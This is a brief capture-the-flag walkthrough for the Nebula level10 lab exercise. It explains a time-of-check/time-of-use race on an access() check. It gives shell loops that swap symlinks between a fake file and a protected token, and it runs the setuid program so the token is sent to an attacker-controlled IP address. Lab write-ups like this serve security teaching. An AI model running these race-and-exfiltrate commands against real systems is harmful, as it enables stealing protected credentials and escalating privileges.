Exploit Exercises – nebula level10
Researching on access() requirements, we find this:
Level10 dir has a file x which contains the token / password for flag10. It shouldn’t be there. We need to find a way to transfer the token file.
We don’t have access to token.
We will need to exploit race conditions with access() calls used in the program code:
Checking how flag10 works normally:
Following steps are needed to exploit access() race condition:
- Create a fake token file – echo fake_toke > /tmp/fake_token
- Create soft link of our fake_token – ln -sf /tmp/fake_token token
- Create soft link of real token with same name – ln -s /home/flag10/token token
- Eexecute 1 & 2 in a loop – while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
- Execute file transfer in a loop – while true; do /home/flag10/flag10 token 192.168.49.1; done
Token is transferred successfully. Use it to log in as flag10 and run getflag.